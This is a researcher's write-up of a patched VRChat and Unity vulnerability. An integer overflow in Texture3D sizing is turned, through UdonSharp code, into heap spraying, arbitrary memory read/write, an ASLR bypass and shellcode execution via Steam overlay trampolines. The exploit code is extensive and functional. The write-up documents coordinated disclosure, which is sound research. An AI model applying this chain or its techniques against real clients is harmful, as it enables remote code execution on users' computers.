Breaking out of VRChat using a Unity bug

This vulnerability is patched in VRChat 2024.3.1p4 and Unity 6000.0.20f1, 2022.3.48f1 and 2021.3.44f1.

THIS DOESN'T MEAN THAT OTHER UNITY GAMES ARE VULNERABLE! Exploiting the bug requires far more user control than the vast majority of other games allow.

VRChat is a fairly popular game that heavily revolves around user-generated content. It's well known for letting users express themselves by creating and uploading their own worlds and avatars for everyone to enjoy. As great (or terrifying, depending on how long you've been on the internet) as that sounds, letting users upload mostly whatever they want in such a free environment also exposes a massive attack surface for software vulnerabilities.

Specifically, I want to focus on VRChat's scripting language, Udon. Udon is a custom bytecode virtual machine used for scripting worlds which can be written either using the Udon Node Graph or UdonSharp. As the name suggests, the Udon Node Graph is a graphical node-based environment driven by connecting inputs and outputs together with lines, while UdonSharp is an environment for compiling scripts written in C# directly to Udon bytecode. Here, I'll be using UdonSharp because I think it's significantly less painful to work with than the graphical editor.

The best part about Udon is that it not only exposes its own APIs, but it also allows the user to use a limited subset of Unity's APIs and the C# standard library. Combined with UdonSharp, this makes writing Udon scripts relatively painless for those who already know how to write C# code for Unity, while still sandboxing untrusted user scripts.

using System;
using UdonSharp;
using UnityEngine;
using VRC.SDKBase;
using VRC.Udon;

public class Cube : UdonSharpBehaviour
{
    public override void Interact()
    {
        Debug.Log("Stop poking me!!!");
    }
}

As long as no potentially dangerous APIs like process creation are exposed to Udon, it shouldn't be able to escape its sandbox, right?

You're reading this post, so obviously, there's more to it. Like every other program, Unity isn't perfectly written. Many of its sanity checks are there to make sure gamedevs don't accidentally blow their feet off, not to defend against malicious users. Although Udon doesn't expose everything, there's still a fairly large surface area to sift through. Let's take a closer look at one particular piece of the engine.

Unity's Textures

Unity's texture classes are used for exposing direct access to texture data on the CPU and uploading them to the GPU. This is useful for dynamically creating and modifying textures without render targets or shaders, like so:

// Create a new 128x128 RGBA32 texture with no mipmaps
Texture2D texture = new Texture2D(128, 128, TextureFormat.RGBA32, false);

// Fill it with a basic XOR pattern
// Not the most efficient way to do it, but this is just an example
for (int y = 0; y < 128; y++)
{
    for (int x = 0; x < 128; x++)
    {
        // SetPixel takes a float color normalized from 0 to 1
        float val = (float)(x ^ y) / 0xFF;
        texture.SetPixel(x, y, new Color(val, val, val, 1.0f));
    }
}

// Upload it to the GPU
texture.Apply();

// Put the texture on the cube
Renderer renderer = GetComponent<Renderer>();
renderer.material.mainTexture = texture;

Unity's Texture2D class caps out at a resolution of 16384px on each axis, which matches the maximum texture size of most modern PC graphics cards today. With the RGBA32 texture format, where each of the four channels is stored as a byte, this ends up being a maximum texture size of 16384 * 16384 * 4 = 1073741824 bytes (1 GB) (technically this could be higher with other pixel formats, but RGBA32 is the easiest one to work with)

We can go beyond 2D, too. There's also a Texture3D class, which as the name suggests, exposes a texture with three dimensions instead of two. How exciting. Unlike the 2D version, this type of texture has a per-axis resolution limit of 2048. While that doesn't sound like much, it adds up to an absurd amount of memory: 2048 * 2048 * 2048 * 4 = 34359738368 bytes (32 GB!!!)

Because I could make textures that massive, I wanted to know what would happen if I allocated a texture that had a size just over the 32-bit unsigned integer limit. This might cause some strange behavior if Unity decides to store the texture size as a 32-bit integer somewhere, but assuming that everything is working properly, it should either allocate the whole thing or refuse to make a texture that large. Let's give it a shot:

// Create a new 2048*2048*256 RGBA32 texture with no mipmaps
// 2048 * 2048 * 256 * 4 = 4294967296 or 0x1_0000_0000
Texture3D texture = new Texture3D(2048, 2048, 256, TextureFormat.RGBA32, false);

// If we get to this point without throwing an exception, then it worked
Debug.Log("Texture created successfully");

Alright, looks like Unity's happy with the texture!

...but my memory usage didn't go up after creating the texture. Hmmm...

Maybe some weird lazy allocation stuff is happening? Let's try writing a bunch of pixels to it to see if that does anything:

// This loop will write bytes spelling out "ABCD" in ASCII contiguously to start of the texture
// 3D textures are laid out in this order: x, y, z
// Think of it like a z-sized array of 2D x by y textures
// Remember that GetColor/SetColor take normalized float colors, but they will be converted to RGBA32
Color col = new Color('A' / 255.0f, 'B' / 255.0f, 'C' / 255.0f, 'D' / 255.0f);
for (int i = 0; i < 0x1000000; i++)
    texture.SetPixel(i % 2048, i / 2048 % 2048, i / 2048 / 2048, col);

...aaaaand that nuked the heap and crashed the game. (check the register values!)

The Bug

NOTE: If you want to play along at home or are interested in doing your own reverse engineering work, Unity has a public symbol store that provides PDBs with symbol names for most Windows Unity builds. Although the specific build VRChat used at the time doesn't appear to be on there, 2022.3.22f1 is close to it and is more than enough for reverse engineering.

When creating a 3D texture (see Texture3D::InitTexture), Unity passes the texture's width, height, format, and mipmap count into a function called ComputeTextureSize.

Notice that explicit texture size check? Not only that, but according to the disassembly, ComputeTextureSize should be returning an unsigned 64-bit integer, which should easily fit the real size of the texture with no problem. What's up with that?

ComputeTextureSize loops over every mipmap level of the texture and calculates the size for each level. I won't go into full detail on how this function works because most of it is irrelevant, but the important part is here:

The function calculates the size for each layer as a signed 32-bit integer, then sign extends the result to 64 bits before adding it to the total texture size. This is fine for figuring out if a texture is greater than 2GB but less than 4GB, since the sign extension will result in a massive unsigned 64-bit integer, failing the caller's size check.

However, values over 4GB will wrap around due to overflow. That means on a 4GB texture with no mipmaps, ComputeTextureSize returns 0, bypassing the size check. The miscalculated size also gets used to allocate the texture buffer, leading to a trivial out-of-bounds heap read/write primitive with a controlled offset via pixel getters and setters.

Now, with that out of the way, it's finally time to write a full exploit!

From Out-of-Bounds to Everywhere

While an out-of-bounds heap read/write within 4GB relative to the broken allocation is great and all, it'd be nicer be able to access memory at any address. To do this, I'll use the OOB texture to overwrite the data pointer of another texture object, then use that texture to read/write memory at that address.

First, a couple of helper functions to make dealing with the OOB memory primitive easier:

// Will be initialized later
private Texture3D oob = null;

private uint read32Rel(int offset)
{
    if (offset % 4 != 0)
    {
        // UdonSharp doesn't want to compile exceptions, so this will have to do
        Debug.LogError($"read32Rel: Offset {offset} must be aligned!!!");
        return 0x41414141;
    }

    int coord = offset / 4;
    var pixel = oob.GetPixel(coord % 2048, coord / 2048 % 2048, coord / 2048 / 2048);
    return ((uint)(pixel[3] * 0xFF) << 24) | ((uint)(pixel[2] * 0xFF) << 16) | ((uint)(pixel[1] * 0xFF) << 8) | (uint)(pixel[0] * 0xFF);
}

private void write32Rel(int offset, uint data)
{
    if (offset % 4 != 0)
    {
        Debug.LogError($"write32Rel: Offset {offset} must be aligned!!!");
        return;
    }

    int coord = offset / 4;
    Color pixel = new Color((data & 0xFF) / 255.0f, ((data >> 8) & 0xFF) / 255.0f, ((data >> 16) & 0xFF) / 255.0f, ((data >> 24) & 0xFF) / 255.0f);
    oob.SetPixel(coord % 2048, coord / 2048 % 2048, coord / 2048 / 2048, pixel);
}

In order to modify another object using the OOB texture, it has to be allocated right after its texture data on the heap.

Thankfully, Unity uses a custom heap allocator based on tlsf that's very easy to manipulate. All I have to do is allocate a bunch of similarly sized objects to fill the free memory holes in the heap before creating the main OOB texture, which should place the its allocation at the end. Then, any new allocations should be accessible from the OOB read/write primitive.

private Texture3D[] spray1 = new Texture3D[16384];
private Texture3D[] spray2 = new Texture3D[1024];

// Try to fill any holes in the heap
// Better to have the spray objects be the exactly the same size as the OOB texture
// These are stored in an array to prevent them from being unexpectedly garbage collected
for (int i = 0; i < spray1.Length; i++)
{
    var temp = new Texture3D(2048, 2048, 256, TextureFormat.RGBA32, false, false);
    spray1[i] = temp;
}

// Set up OOB read/write texture
oob = new Texture3D(2048, 2048, 256, TextureFormat.RGBA32, false, false);
Debug.Log("oob texture created successfully");

// Spray Texture3Ds to eventually turn one of them into an arbitrary read/write primitive
// They're more convenient than Texture2D because they don't have an extra layer of indirection for the data pointer
for (int i = 0; i < spray2.Length; i++)
{
    var temp = new Texture3D(1, 1, 1, TextureFormat.RGBA32, false, false);
    spray2[i] = temp;
}

Once that's done, I can search for and modify one of the sprayed dummy textures in OOB memory in order to have both a reference to the object in C# and its raw memory. The object search also doubles as a way to find UnityPlayer.dll's base address in order to defeat ASLR.

private const uint TEX3D_VTBL_RVA = 0x197D288;
private ulong unityPlayerBase = 0;
private int arbTexOffset = -1;      // arbTex's offset relative to the OOB texture
private Texture3D arbTex = null;

// Try to find one of the sprayed Texture3Ds
for (int i = 0; i < 4096; i += 8)
{
    // All 64-bit modules with ASLR have the top 24 bits of their base set to 0x00007F
    // In order to check if the leaked pointer is Texture3D's vtable,
    // the expected relative address gets subtracted and the result has to be page-aligned
    ulong leak = ((ulong)read32Rel(i + 4) << 32) | read32Rel(i);
    if (((leak >> 40) & 0xFFFFFF) == 0x7F && ((leak - TEX3D_VTBL_RVA) & 0xFFF) == 0)
    {
        Debug.Log($"found texture3d at oob rel 0x{i:X}");
        unityPlayerBase = leak - TEX3D_VTBL_RVA;
        arbTexOffset = i;
        break;
    }
}
if (arbTexOffset == -1)
{
    Debug.LogError("failed to find texture3d to corrupt");
    return;
}

// Modify its width and try to find the object in the spray2 array
// In testing, the initial heap spray worked so well that it always used spray2[0] as the target
// Still, better safe than sorry!
write32Rel(arbTexOffset + 0x118, 2);
for (int i = 0; i < spray2.Length; i++)
{
    if (spray2[i].width == 2)
    {
        Debug.Log($"found corrupted texture3d! spray2[0x{i:X}] with width {spray2[i].width}");
        arbTex = spray2[i];
        break;
    }
}
if (arbTex == null)
{
    Debug.LogError("failed to find corrupted texture3d");
    return;
}

Finally, I can construct an arbitrary read/write primitive by overwriting the data pointer. Since the target texture is now RGBA32 2x1x1, I can read/write 64 bits at a time, which is the perfect amount to be useful for exploit setup.

private ulong read64(ulong addr)
{
    // Overwrite the texture data pointer
    write32Rel(arbTexOffset + 0x128, (uint)(addr & 0xFFFFFFFF));
    write32Rel(arbTexOffset + 0x12C, (uint)(addr >> 32));

    var data = arbTex.GetPixels32();

    return data[0][0] |
            ((ulong)data[0][1] << 8) |
            ((ulong)data[0][2] << 16) |
            ((ulong)data[0][3] << 24) |
            ((ulong)data[1][0] << 32) |
            ((ulong)data[1][1] << 40) |
            ((ulong)data[1][2] << 48) |
            ((ulong)data[1][3] << 56);
}

private void write64(ulong addr, ulong val)
{
    write32Rel(arbTexOffset + 0x128, (uint)(addr & 0xFFFFFFFF));
    write32Rel(arbTexOffset + 0x12C, (uint)(addr >> 32));

    var data = new Color32[2]
    {
        new Color32((byte)(val & 0xFF), (byte)((val >> 8) & 0xFF), (byte)((val >> 16) & 0xFF), (byte)((val >> 24) & 0xFF)),
        new Color32((byte)((val >> 32) & 0xFF), (byte)((val >> 40) & 0xFF), (byte)((val >> 48) & 0xFF), (byte)((val >> 56) & 0xFF)),
    };

    arbTex.SetPixels32(data);
}

Finally, I can use these primitives to set up a ROP chain and overwrite the target texture's vtable to pivot the stack and run shellcode.

...

...

Despite UnityPlayer.dll being a relatively large binary and having plenty of ROP gadgets, I still don't really want to write a ROP chain if I don't have to. It would be nice if I had some convenient writable executable memory to write my shellcode to instead of having to write yet another VirtualAlloc/VirtualProtect ROP chain. (Un)fortunately, VRChat uses IL2CPP, which means all of the game's C# code is precompiled and there won't be anything from a JIT.

Still, it can't hurt to check, right?

Why ROP When You Have Steam

Like most modern PC games, VRChat is on Steam, which has an in-game overlay accessible by pressing Shift+Tab. In order to be able to do this on almost every game without explicit integration from the original developers, the overlay DLL (GameOverlayRenderer64.dll) has to hook a few functions to intercept various things such as input. For some reason, it seems like Valve decided to write their own hooking library. The anatomy of a hooked function looks something like this:

The trampoline region is allocated within 2GB of the hooked function and exists because of an x86_64 limitation. Hooks usually want to overwrite as few instructions as possible in order to avoid issues, so a 5-byte jump is used for the initial hook jump.

However, there's only 4 bytes for a signed relative offset and the destination is usually over 2GB away, which is why the hook has to "bounce" off of the trampoline region in order to reach it via a larger jump (6-byte instruction + 8-byte pointer). It also stores the instructions that the initial jump overwrote in order to make sure the hook can still call the original function.

For some reason, Valve made the "interesting" design decision of making that trampoline region readable, writable, and executable at all times. This effectively turns these regions into free "Get Out of ROP Free" cards that exist on every 64-bit Steam game as long as the overlay is enabled.

UPDATE (2024/11/23): GameOverlayRenderer64.dll still installs its hooks regardless of whether the overlay or Steam Input are enabled, as long as the game was launched through Steam or it initializes the Steam API. Thanks Emma!

The screenshot also shows one of these trampoline regions being allocated for xinput1_3.dll, a DLL notoriously known for not having ASLR enabled for some reason. For this exploit, I didn't want to rely on that region always being at the same address because it's entirely possible that something else could take up that region of memory before XInput gets loaded or the hook gets installed. Besides, I didn't want this exploit chain to be that easy.

Instead, I opted to get one of the hooked functions from UnityPlayer.dll's import address table and read the jump instruction for the hook (jmp hook_entry) in order to find one of these magic RWX regions. This has the benefit of being able to check if the overlay is actually loaded before trying to write any shellcode instead of taking a leap of faith and blindly writing to a RWX region that may or may not be there. From here, code execution is trivial and the exploit is complete.

private const uint LOADLIBRARYEXW_RVA = 0x185F658;
private const uint GETMODULEHANDLEA_RVA = 0x185F6E8;
private const uint GETPROCADDRESS_RVA = 0x185F7D0;
private const uint SCRATCH_RVA = 0x1BF00B0; // Can be any random part of .data

// Get LoadLibraryExW's address from UnityPlayer.dll's IAT
ulong hook_addr = read64(unityPlayerBase + LOADLIBRARYEXW_RVA);

// Find one of GameOverlayRenderer64's RWX trampoline regions using the hook jump
ulong hook = read64(hook_addr);
if ((hook & 0xFF) != 0xE9)
{
    Debug.LogError("LoadLibraryExW isn't hooked by GameOverlayRenderer64");
    return;
}
ulong offset = (hook >> 8) & 0xFFFFFFFF;
ulong target = hook_addr + offset + 5;
if ((offset & 0x80000000) != 0)
    target -= 0x100000000; // UdonSharp doesn't support unchecked signed <-> unsigned conversion and it's REALLY ANNOYING

// Write shellcode to the RWX region
for (int i = 0; i < shellcode.Length; i++)
{
    // Replace placeholder values with addresses known at runtime
    ulong val = shellcode[i];
    if (val == 0x4141414141414141)
        val = read64(unityPlayerBase + GETMODULEHANDLEA_RVA);
    else if (val == 0x4242424242424242)
        val = read64(unityPlayerBase + GETPROCADDRESS_RVA);
    write64(target + (ulong)i * 8, val);
}

// Put a fake vtable somewhere
// This points Texture3D::MainThreadCleanup to the shellcode
write64(unityPlayerBase + SCRATCH_RVA + 8, target);

// Overwrite the arbitrary r/w texture's vtable pointer
write32Rel(arbTexOffset, (uint)((unityPlayerBase + SCRATCH_RVA) & 0xFFFFFFFF));
write32Rel(arbTexOffset + 4, (uint)((unityPlayerBase + SCRATCH_RVA) >> 32));

// Call MainThreadCleanup by destroying the texture and run the shellcode!
Destroy(arbTex);

(as for the title of the video, this really wasn't the first time I did this, but that writeup is lost to time...)

To Udon devs: This exploit was why this regression happened. A check was added for the texture constructors to make sure the size wouldn't overflow, but not every format was handled in the check. Sorry about that :(

Honorable Mention

This wasn't something I used in the final exploit, but I thought it was interesting enough to mention. While experimenting with large texture sizes, I noticed an interesting parameter in Texture2D's constructor:

Then I checked what was exposed in Udon:

And I gave it a shot:

Yes, this really did allow reading uninitialized heap memory via intended Unity behavior. Thankfully, I didn't see any other obvious API whitelist oversights like this. Although these constructors are still exposed in the latest version, they now throw an exception if createUninitialized is enabled.

Thanks to Tupper, the rest of the VRChat team, and Unity for their cooperation in getting these vulnerabilities fixed.